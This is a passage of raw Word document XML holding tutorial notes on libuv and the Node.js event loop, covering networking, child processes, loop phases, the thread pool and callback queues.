          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv handles low-level network operations, including TCP and UDP communication. It abstracts the complexities of networking across different platforms, providing an easy-to-use API for asynchronous networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008DA61B" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Child Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A0E8F" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>libuv provides functionality to spawn and manage child processes. This is useful for executing external commands or running other scripts without blocking the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D58FE" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How libuv Works in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CBF3CB" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Event Loop Phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354A5AF" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The event loop in libuv is divided into several phases, each responsible for different types of tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11651CD8" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Timers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executes callbacks scheduled by setTimeout and setInterval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F103E18" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pending Callbacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executes callbacks deferred to the next loop iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AFE53" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Idle, Prepare:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal use only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BADA9" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Poll:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieves new I/O events, executing I/O-related callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF221BC" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Check:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executes setImmediate callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04EE01" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Close Callbacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handles cleanup of closed connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B8BDB" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling I/O Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A13530" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a Node.js application makes an I/O request (e.g., reading a file), libuv queues the request in the appropriate event loop phase. If the operation is non-blocking, it’s added to the poll phase, where libuv waits for the operation to complete and then executes the callback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A824A1A" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Thread Pool for Blocking Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361B538" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For operations that cannot be handled asynchronously by the event loop (like file system operations), libuv offloads the task to the thread pool. Once the operation is complete, the event loop is notified, and the corresponding callback is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671DCCA" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Importance of libuv in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69301B1B" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> libuv enables Node.js to handle thousands of concurrent connections using a single thread, making it ideal for I/O-bound applications like web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CBFF5" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Portability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> By abstracting platform-specific details, libuv allows Node.js to run consistently across different operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD2273" w14:textId="77777777" w:rsidR="000002BD" w:rsidRPr="00DA2F32" w:rsidRDefault="000002BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="639"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Blocking I/O:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> libuv’s non-blocking I/O model is key to Node.js’s ability to perform well in real-time applications, such as chat applications, live updates, and data streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072A172" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fundamental concept in Node.js, responsible for handling asynchronous operations. It allows Node.js to perform non-blocking I/O operations—despite being single-threaded—by offloading tasks to the system kernel whenever possible and executing callbacks when an operation completes. Understanding the event loop is crucial for grasping how Node.js manages concurrency and handles asynchronous code efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A84691" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of the Event Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7EC57" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single-Threaded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672279E7" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js is single-threaded, meaning it runs on a single main thread. However, it can handle multiple operations concurrently by using the event loop, which orchestrates the execution of callbacks when asynchronous operations complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB8AE1" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Asynchronous I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBAC29" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js uses non-blocking, asynchronous I/O to maximize the use of a single thread. Operations like reading files, making network requests, or querying a database are handled asynchronously, allowing the event loop to continue executing other code without waiting for these operations to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508733E" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Queue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2039DCE7" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When an asynchronous operation completes, its callback is added to the callback queue. The event loop checks this queue and executes callbacks when it is idle or when no other code is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC596A" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="640"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Phases of the Event Loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F2CFF" w14:textId="77777777" w:rsidR="00C61D82" w:rsidRPr="00DA2F32" w:rsidRDefault="00C61D82" w:rsidP="009E0607">
